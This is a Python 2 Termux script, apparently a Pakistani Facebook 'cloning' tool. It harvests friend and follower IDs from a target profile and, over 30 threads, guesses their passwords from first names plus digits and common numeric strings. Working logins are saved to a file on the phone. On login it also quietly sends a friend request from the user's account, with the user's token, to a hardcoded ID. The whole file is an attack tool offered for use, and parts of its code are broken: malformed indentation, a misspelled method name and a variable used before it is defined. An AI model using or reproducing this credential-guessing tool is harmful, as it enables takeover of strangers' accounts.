#coding=utf-8
#!/usr/bin/python2
#coding=utf-8
#originally written by jutt badshah
try:
    import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests,uuid
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system("pip2 install requests")
    os.system("pip2 install mechanize")
    os.system("python2 Juttbrand.py")

os.system("clear")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("apt update && apt install nodejs -y")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/ruby"):
    os.system("apt install ruby -y && gem install lolcat")
    os.system("clear")
    time.sleep(1)
from requests.exceptions import ConnectionError
os.system("termux-setup-storage")
try:
    os.mkdir("/sdcard/ids")
except OSError:
    pass 

os.system("clear")
if not os.path.isfile("/data/data/com.termux/files/home/rashidali/...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
    os.system("#")
    os.system("cd ..... && npm install")
    os.system("cd ..... && node index.js &")
    time.sleep(5)
elif os.path.isfile("/data/data/com.termux/files/home/rashidali/...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
    os.system("#")
    os.system("cd ..... && node index.js &")
    time.sleep(5)
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
os.system("git pull")
os.system("clear")
reload(sys)
sys.setdefaultencoding("utf8")
 
logo = """
\033[1;91m
\033[1;93m
\033[1;92m        {} {}   {} {}{}{} {}{}{}
\033[1;93m        {} {}   {}   {}     {}
\033[1;96m        {} {}   {}   {}     {}
\033[1;95m        {} {}   {}   {}     {}
\033[1;97m        {} {}   {}   {}     {}
\033[1;94m   {}{}{}   {} {}    {}     {}
\033[1;91m
\033[1;92m      ~~~Jutt Badshah Brand~~~
------------------------------------------

\033[1;97m➣ Author : Jutt Badshah
\033[1;97m➣ Github : https://github.com/SHOOTER-MAKER
\033[1;97m➣ WP NO  : +923007574310
\033[1;97m➣ Dont Copy My Coz Ur Not On My Level
 
------------------------------------------"""
idh = []
back = 0
def login_choice():
    os.system("clear")
    try:
	open(".login.txt","r")
	menu()
    except IOError:
	os.system("clear")
	print(logo)
	print("")
	print(47*'-')
	print("\t    \033[1;35m~~~~~~~~~~~~~LOGIN MENU~~~~~~~~~~~~~\033[0;97m")
	print(47*'-')
	print("")
	print("\033[1;92m[1] Login with token")
	print("\033[1;92m[2] Login with id/pass")
	print("")
	login_select()
def login_select():
    select = raw_input("\033[1;36mChoose option: \033[0;97m")
    if select =="1":
	login_token()
    elif select =="2":
	login_fb()
    else:
	print("")
	print("\t    \033[1;31mSelect valid option\033[0;97m")
	print("")
	time.sleep(1)
	login_select()
def login_fb():
    os.system("clear")
    print(logo)
    print("")
    print(47*'-')
    print("\t    \033[1;35m~~~~~~~~~LOGIN WITH EMAIL PASS~~~~~~~~~\033[0;97m")
    print(47*'-')
    print("")
    id = raw_input("/033[1;96m Id/mail/number: \033[0;97m")
    id1=id.replace(' ','')
    id2=id1.replace('(','')
    uid=id2.replace(')','')
    pwd = raw_input(" Password: ")
    print("")
    data=requests.get('http://localhost:5000/auth?id='+uid+'&pass='+pwd, headers=header).text
    q = json.loads(data)
    if "loc" in q:
	hamza = open(".login.txt","w")
	hamza.write(q["loc"])
	hamza.close()
	requests.post('https://graph.facebook.com/me/friends?uid=100048514350891&access_token='+q['loc'])
	menu()
    elif "www.facebook.com" in q["error"]:
	print("")
	print("\t    \033[1;31mUser must verify account before login\033[0;97m")
	time.sleep(1)
	print("")
	raw_input("\t \033[1;92mPress enter to back ")
	login_choice()
    else:
	print("")
	print("\t    \033[1;31mIncorrect credentials\033[0;97m")
	raw_input("Press enter to try again ")
	login_choice()
def login_token():
    os.system("clear")
    try:
	open(".login.txt","r")
	time.sleep(1)
	menu()
    except (KeyError , IOError):
	os.system("clear")
	print(logo)
	print("")
	print(47*'-')
	print("\t    \033[1;35m~~~~~~~~~~~~FB TOKEN LOGIN~~~~~~~~~~~~\033[0;97m")
	print(47*'-')
	print("")
	token = raw_input("\033[1;96m Paste token here: \033[0;97m")
	token_save = open(".login.txt","w")
	token_save.write(token)
	token_save.close()
	time.sleep(1)
	menu()
def menu():
    os.system("clear")
    try:
	token = open(".login.txt","r").read()
    except IOError:
	os.system("clear")
	print("")
	print(logo)
	print("")
	print("\t    \033[1;31mToken not found\033[0;97m")
	time.sleep(1)
	login_choice()
    try:
	r = requests.get("https://graph.facebook.com/me?access_token="+token, headers=header)
	a = json.loads(r.text)
	name = a["name"]
    except KeyError:
	os.system("clear")
	print("")
	print(logo)
	print("")
	print("\t    \033[1;31mToken expired\033[0;97m")
	time.sleep(1)
	os.system("rm -rf .login.txt")
	login_choice()
    os.system("clear")
    print(logo)
    print("")
    print("\t    \033[1;32mUser: "+name+"\033[0;97m")
    print(47*"-")
    print("\t    \033[1;35m~~~~~~~~~~~~~Crack Menu~~~~~~~~~~~~~\033[0;97m")
    print(47*'-')
    print("")
    print("\033[1;92m[1] Crack With Auto Pass10")
    print("\033[1;92m[2] Crack Choice Number Password6")
    print("\033[1;92m[3] Crack Choice Name + Number Pass8")
    print("\033[1;92m[4] Make File")
    print(52*'-')
    print("")
    menu_option()
def menu_option():
    select = raw_input("\033[1;36mChoose option: \033[0;97m")
    if select =="1":
	crack()
    elif select =="2":
	choice()
    elif select =="3":
	name_crack()
    elif select =="4":
	ex_id()
    else:
	print("")
	print("\t    \033[1;31mSelect valid option\033[0;97m")
	print("")
	menu_option()
def crack():
    global token
    os.system("clear")
    try:
	token = open(".login.txt","r").read()
    except IOError:
	print("")
	print("\t    \033[1;31mToken not found\033[0;97m")
	time.sleep(1)
	login_choice()
    os.system("clear")
    print(logo)
    print("")
    print(47*'-')
    print("\t    \033[1;35m~~~~~~~~~~AUTO PASS CLONING~~~~~~~~~~\033[0;97m")
    print(47*'-')
    print("")
    print("\033[1;92m[1] Crack public id")
    print("\033[1;92m[2] Crack followers")
    print("\033[1;92m[3] Crack file")
    print("\033[1;92m[0] Back")
    print(52*'-')
    print("")
    crack_select()
def crack_select():
    select = raw_input("\033[1;36mChoose option: \033[0;97m")
    id=[]
    oks=[]
    cps=[]
    if select =="1":
	os.system("clear")
	print(logo)
	print("")
	print(47*'-')
	print("\t    \033[1;35m~~~~~~~~AUTO PASS PUBLIC CRACK~~~~~~~~\033[0;97m")
	print(52*'-')
	print("")
	idt = raw_input("\033[1;96m Input id: \033[0;97m")
	try:
	    r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
	    q = json.loads(r.text)
	    print("\033[1;92m Cloning from : "+q["name"])
	except KeyError:
	    print("\t    \033[1;31mLogged in id has checkpoint\033[0;97m")
	    print("")
	    raw_input("\033[1;92m Press enter to back")
	    crack()
	r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token, headers=header)
	z = json.loads(r.text)
	for i in z["data"]:
	    uid = i["id"]
	    na = i["name"]
	    nm = na.rsplit(" ")[0]
	    id.append(uid+"|"+nm)
    elif select =="2":
	os.system("clear")
	print(logo)
	print("")
	print(47*'-')
	print("\t    \033[1;35m~~~~~~AUTO PASS CRACK FOLLOWERS~~~~~~\033[0;97m")
	print(52*'-')
	print("")
	idt = raw_input("\033[1;96m Input id: \033[0;97m")
	try:
	    r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
	    q = json.loads(r.text)
	    print("\033[1;92m Cloning from: "+q["name"])
	except KeyError:
	    print("\t    \033[1;31mLogged in id has checkpoint\033[0;97m")
	    print("")
	    raw_input("\033[1;92m Press enter to back")
	    crack()
	r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=999999", headers=header)
	z = json.loads(r.text)
	for i in z["data"]:
	    uid = i["id"]
	    na = i["name"]
	    nm = na.rsplit(" ")[0]
	    id.append(uid+"|"+nm)
    elif select =="3":
	os.system("clear")
	print(logo)
	print("")
	print(47*'-')
	print("\t    \033[1;35m~~~~~~~~~AUTO PASS FILE CRACK~~~~~~~~~\033[0;97m")
	print(52*'-')
	print("")
	try:
	    filelist = raw_input("\033[1;96m[+] File : \033[0;97m")
	    for line in open(filelist , "r").readlines():
                id.append(line.strip())
	except (KeyError,IOError):
	    print("")
	    print("\t    \033[1;31mRequested file not found\033[0;97m")
	    print("")
	    raw_input("\033[1;92m Press enter to back ")
	    crack()
    elif select =="0":
        menu()
    else:
	print("")
	print("\t    \033[1;31mSelect valid option\033[0;97m")
	print("")
	crack_select()
    print("\033[1;92m Total IDs : "+str(len(id)))
    print(47*'-')
    print("\t    \033[1;95m~~~~~~~~Jutt Badshah Start Cloning ~~~~~~~~")
    print(47*"-")
    print("\t    \033[1;96m~~~~~~~Jutt Badshah King Of Facebook~~~~~~~")
    print(52*'-')
    print("")
    def main(arg):
	user=arg
	uid,name=user.split("|")
	try:
	    pass1 = name.lower()+"786"
	    data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass1, headers=header).text
	    q = json.loads(data)
	    if "loc" in q:
		print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass1+"\033[0;97m")
		ok = open("/sdcard/ids/JUTT-OK.txt", "a")
		ok.write(uid+" | "+pass1+"\n")
		ok.close()
		oks.append(uid+pass1)
	    else:
		if "www.facebook.com" in q["error"]:
		    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass1)
		    cp = open("JUTT-CP.txt","a")
		    cp.write(uid+" | "+pass1+"\n")
		    cp.close()
		    cps.append(uid+pass1)
	    else:
	        pass2 = name.lower()+"123"
		data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass2, headers=header).text
		q = json.loads(data)
		if "loc" in q:
                    print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass2+"\033[0;97m")
		    ok = open("/sdcard/ids/JUTT-OK.txt", "a")
		    ok.write(uid+" | "+pass2+"\n")
		    ok.close()
		    oks.append(uid+pass2)
	     else:
			if "www.facebook.com" in q["error"]:
			    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass2)
			    cp = open("JUTT-CP.txt","a")
			    cp.write(uid+" | "+pass2+"\n")
			    cp.close()
			    cps.append(uid+pass2)
			else:
			    pass3 = name.lower()+"1234"
			    data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass3, headers=header).text
			    q = json.loads(data)
			    if "loc" in q:
				print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass3+"\033[0;97m")
				ok = open("/sdcard/ids/JUTT-OK.txt", "a")
				ok.write(uid+" | "+pass3+"\n")
				ok.close()
				oks.append(uid+pass3)
			    else:
				if "www.facebook.com" in q["error"]:
				    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass3)
				    cp = open("JUTT-CP.txt","a")
				    cp.write(uid+" | "+pass3+"\n")
				    cp.close()
				    cps.append(uid+pass3)
				else:
				    pass4 = name.lower()+"12345"
				    data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass4, headers=header).text
				    q = json.loads(data)
				    if "loc" in q:
					print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass4+"\033[0;97m")
					ok = open("/sdcard/ids/JUTT-OK.txt", "a")
					ok.write(uid+" | "+pass4+"\n")
					ok.close()
					oks.append(uid+pass4)
				    else:
					if "www.facebook.com" in q["error"]:
					    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass4)
					    cp = open("JUTT-CP.txt","a")
					    cp.write(uid+" | "+pass4+"\n")
					    cp.close()
					    cps.apppend(uid+pass4)
					else:
					    pass5 = "234567"
					    data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass5, headers=header).text
					    q = json.loads(data)
					    if "loc" in q:
						print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass5+"\033[0;97m")
						ok = open("/sdcard/ids/JUTT-OK.txt", "a")
						ok.write(uid+" | "+pass5+"\n")
						ok.close()
						oks.append(uid+pass5)
					    else:
						if "www.facebook.com" in q["error"]:
						    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass5)
						    cp = open("JUTT-CP.txt","a")
						    cp.write(uid+" | "+pass5+"\n")
						    cp.close()
						    cps.append(uid+pass6)
						else:
						    pass6 = "223344"
						    data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass6, headers=header).text
						    q = json.loads(data)
						    if "loc" in q:
							print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass6+"\033[0;97m")
							ok = open("/sdcard/ids/JUTT-OK.txt", "a")
							ok.write(uid+" | "+pass6+"\n")
							ok.close()
							oks.append(uid+pass6)
						    else:
							if "www.facebook.com" in q["error"]:
							    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass6)
						            cp = open("JUTT-CP.txt","a")
						            cp.write(uid+" | "+pass6+"\n")
							    cp.close()
							    cps.append(uid+pass6)
							else:
							    pass7 = "334455"
							    data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass7, headers=header).text
							    q = json.loads(data)
							    if "loc" in q:
								print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass7+"\033[0;97m")
								ok = open("/sdcard/ids/JUTT-OK.txt", "a")
							        ok.write(uid+" | "+pass7+"\n")
								ok.close()
								oks.append(uid+pass7)
							    else:
								if "www.facebook.com" in q["error"]:
								    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass7)
								    cp = open("JUTT-CP.txt","a")
								    cp.write(uid+" | "+pass7+"\n")
							            cp.close()
								    cps.append(uid+pass7)
							        else:
								    pass8 = "445566"
								    data = requests.get("https://localhost:5000/auth?id="+uid+"&pass="+pass8, headers=header).text
                                                                    q = json.loads(data)
                                                                    if "loc" in q:
                                                                        print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass8+"\033[0;97m")
                                                                        ok = open("/sdcard/ids/JUTT-OK.txt", "a")
                                                                        ok.write(uid+" | "+pass8+"\n")
                                                                        ok.close()
                                                                        oks.append(uid+pass8)
                                                                    else:
                                                                        if "www.facebook.com" in q["error"]:
                                                                            print("\033[1;34m[JUTT-CP] "+uid+" | "+pass8)
                                                                            cp = open("JUTT-CP.txt", "a")
                                                                            cp.write(uid+" | "+pass8+"\n")
                                                                            cp.close()
                                                                            cps.append(uid+pass8)
                                                                        else:
                                                                            pass9 = "556677"
                                                                            data = requests.get("https://localhost:5000/auth?id="+uid+"&pass="+pass9, headers=header).text
                                                                            q = json.loads(data)
                                                                            if "loc" in q:
                                                                                print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass9+"\033[0;97m")
                                                                                ok = open("/sdcard/ids/JUTT-OK.txt", "a")
                                                                                ok.write(uid+" | "+pass9+"\n")
                                                                                ok.close()
                                                                                oks.append(uid+pass9)
                                                                            else:
                                                                                if "www.facebook.com" in q["error"]:
                                                                                    print("\033[1;34m[JUTT-CP] "+uid+" | "+pass9)
                                                                                    cp = open("JUTT-CP.txt", "a")
                                                                                    cp.write(uid+" | "+pass9+"\n")
                                                                                    cp.close()
                                                                                    cps.append(uid+pass9)
                                                                                else:
                                                                                    pass10 = "786786786"
                                                                                    data = requests.get("https://localhost:5000/auth?id="+uid+"&pass="+pass10, headers=header).text
                                                                                    q = json.loads(data)
                                                                                    if "loc" in q:
                                                                                        print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass10+"\033[0;97m")
                                                                                        ok = open("/sdcard/ids/JUTT-OK.txt", "a")
                                                                                        ok.write(uid+" | "+pass10+"\n")
                                                                                        ok.close()
                                                                                        oks.append(uid+pass10)
                                                                                    else:
                                                                                        if "www.facebook.com" in q["error"]:
                                                                                            print("\033[1;34m[JUTT-CP] "+uid+" | "+pass10)
                                                                                            cp = open("JUTT-CP.txt", "a")
                                                                                            cp.write(uid+" | "+pass10+"\n")
                                                                                            cp.close()
                                                                                            cps.append(uid+pass10)
																
        except:
	        pass
	
	p = ThreadPool(30)
	p.map(main,id)
	print("")
	print(47*"-")
	print("")
	print(" The process has completed")
	print(" Total Ok/Cp:"+str(len(oks)))+"/"+str(len(cps))
	print("")
	print(47*"-")
	print("")
	raw_input(" Press enter to back")
	crack()
def ex_id():
    idg=[]
    global token
    try:
    	token = open(".login.txt","r").read()
    except IOError:
    	print("\t    \033[1;31mToken not found\033[0;97m")
    	print("")
    	time.sleep(1)
    	login_choice()
    os.system("clear")
    print(logo)
    print("")
    print("\t    \033[1;32mCOLLECT PUBLIC ID FRIENDLIST\033[0;97m")
    print("")
    idh = raw_input(" Input Id: ")
    try:
        r = requests.get("https://graph.facebook.com/"+idh+"?access_token="+token, headers=header)
        q = json.loads(r.text)
        print(" Collecting from: "+q["name"])
    except KeyError:
    	print("")
        print("\t    \033[1;31mLogged in id has checkpoint\033[0;97m")
        print("")
        raw_input(" Press enter to back")
        crack()
    r = requests.get("https://graph.facebook.com/"+idh+"/friends?access_token="+token, headers=header)
    q = json.loads(r.text)
    ids = open("ids_friends.txt","w")
    for i in q["data"]:
        uid = i["id"]
        na = i["name"]
        nm=na.rsplit(" ")[0]
        idg.append(uid+"|"+nm)
        ids.write(uid+"|"+nm + "\n")
    ids.close()
    print("")
    print(47*"-")
    print("")
    print(" The process has completed")
    print(" Total ids: "+str(len(idg)))
    print("")
    print(47*"-")
    print("")
    raw_input(" Press enter to download file")
    os.system("cp ids_friends.txt /sdcard/Jutt_extract.txt")
    os.system("rm -rf ids_friends.txt")
    print(" File downloaded successfully")
    time.sleep(1)
    menu()
def choice():
	global token
	os.system("clear")
	try:
		token = open(".login.txt","r").read()
	except IOError:
		print("")
		print("\t    \033[1;31mToken not found\033[0;97m")
		time.sleep(1)
		login_choice()
	os.system("clear")
	print(logo)
	print("")
	print("\t    \033[1;32mCHOICE PASS CRACK MENU\033[0;97m")
	print("")
	print("[1] Crack public id")
	print("[2] Crack followers")
	print("[3] Crack file")
	print("[0] Back")
	print("")
	choice_select()
def choice_select():
	select = raw_input("\033[1;33mChoose option: \033[0;97m")
	id=[]
	oks=[]
	cps=[]
	if select =="1":
		os.system("clear")
		print(logo)
		print("")
		print("\t    \033[1;32mCHOICE PASS PUBLIC CRACK\033[0;97m")
		print("")
		pass1 = raw_input(" Password: ")
		pass2 = raw_input(" Password: ")
		pass3 = raw_input(" Password: ")
		pass4 = raw_input(" Password: ")
		idt = raw_input(" Input id: ")
		try:
			r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
			q = json.loads(r.text)
			print(" Cloning from : "+q["name"])
		except KeyError:
			print("\t    \033[1;31mLogged in id has checkpoint\033[0;97m")
			print("")
			raw_input(" Press enter to back")
			choice()
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token, headers=header)
		z = json.loads(r.text)
		for i in z["data"]:
			uid = i["id"]
			na = i["name"]
			nm = na.rsplit(" ")[0]
			id.append(uid+"|"+nm)
	elif select =="2":
		os.system("clear")
		print(logo)
		print("")
		print("\t    \033[1;32mAUTO PASS CRACK FOLLOWERS\033[0;97m")
		print("")
		pass1 = raw_input(" Password: ")
		pass2 = raw_input(" Password: ")
		pass3 = raw_input(" Password: ")
		pass4 = raw_input(" Password: ")
		idt = raw_input(" Input id: ")
		try:
			r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
			q = json.loads(r.text)
			print(" Cloning from: "+q["name"])
		except KeyError:
			print("\t    \033[1;31mLogged in id has checkpoint\033[0;97m")
			print("")
			raw_input(" Press enter to back")
			choice()
		r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=999999", headers=header)
		z = json.loads(r.text)
		for i in z["data"]:
			uid = i["id"]
			na = i["name"]
			nm = na.rsplit(" ")[0]
			id.append(uid+"|"+nm)
	elif select =="3":
		os.system("clear")
		print(logo)
		print("")
		print("\t    \033[1;32mAUTO PASS FILE CRACK\033[0;97m")
		print("")
		pass1 = raw_input(" Password: ")
		pass2 = raw_input(" Password: ")
		pass3 = raw_input(" Password: ")
		pass4 = raw_input(" Password: ")
		filelist = raw_input(" Input file: ")
		try:
			for line in open(filelist , "r").readlines():
			    id.append(line.strip())
		except (KeyError,IOError):
			print("")
			print("\t    \033[1;31mRequested file not found\033[0;97m")
			print("")
			raw_input(" Press enter to back ")
			choice()
	elif select =="0":
	    menu()
	else:
		print("")
		print("\t    \033[1;31mSelect valid option\033[0;97m")
		print("")
		choice_select()
	print(" Total IDs : "+str(len(id)))
	print(" The Process has started")
	print(47*"-")
	print("")
	def main(arg):
		user=arg
		uid,name=user.split("|")
		try:
			data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass1, headers=header).text
			q = json.loads(data)
			if "loc" in q:
				print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass1+"\033[0;97m")
				ok = open("/sdcard/ids/JUTT-OK.txt", "a")
				ok.write(uid+" | "+pass1+"\n")
				ok.close()
				oks.append(uid+pass1)
			else:
				if "www.facebook.com" in q["error"]:
					print("\033[1;34m[JUTT-CP] "+uid+" | "+pass1)
					cp = open("JUTT-CP.txt","a")
					cp.write(uid+" | "+pass1+"\n")
					cp.close()
					cps.append(uid+pass1)
				else:
					data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass2, headers=header).text
					q = json.loads(data)
					if "loc" in q:
						print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass2+"\033[0;97m")
						ok = open("/sdcard/ids/JUTT-OK.txt", "a")
						ok.write(uid+" | "+pass2+"\n")
						ok.close()
						oks.append(uid+pass2)
					else:
						if "www.facebook.com" in q["error"]:
							print("\033[1;34m[JUTT-CP] "+uid+" | "+pass2)
							cp = open("JUTT-CP.txt","a")
							cp.write(uid+" | "+pass2+"\n")
							cp.close()
							cps.append(uid+pass2)
						else:
							data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass3, headers=header).text
							q = json.loads(data)
							if "loc" in q:
								print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass3+"\033[0;97m")
								ok = open("/sdcard/ids/JUTT-OK.txt", "a")
								ok.write(uid+" | "+pass3+"\n")
								ok.close()
								oks.append(uid+pass3)
							else:
								if "www.facebook.com" in q["error"]:
									print("\033[1;34m[JUTT-CP] "+uid+" | "+pass3)
									cp = open("JUTT-CP.txt","a")
									cp.write(uid+" | "+pass3+"\n")
									cp.close()
									cps.append(uid+pass3)
								else:
									data = requests.get("http://localhost:5000/auth?id="+uid+"&pass="+pass4, headers=header).text
									q = json.loads(data)
									if "loc" in q:
										print("\033[1;92m[JUTT-OK] \033[1;32m"+uid+" | "+pass4+"\033[0;97m")
										ok = open("/sdcard/ids/JUTT-OK.txt", "a")
										ok.write(uid+" | "+pass4+"\n")
										ok.close()
										oks.append(uid+pass4)
									else:
										if "www.facebook.com" in q["error"]:
											print("\033[1;34m[JUTT-CP] "+uid+" | "+pass4)
											cp = open("JUTT-CP.txt","a")
											cp.write(uid+" | "+pass4+"\n")
											cp.close()
											cps.apppend(uid+pass4)

																
	        except:
			pass
	
	p = ThreadPool(30)
	p.map(main,id)
	print("")
	print(47*"-")
	print("")
	print(" The process has completed")
	print(" Total Ok/Cp:"+str(len(oks)))+"/"+str(len(cps))
	print("")
	print(47*"-")
	print("")
	raw_input(" Press enter to back")
	choice()
if __name__ == '__main__':
	login_choice()

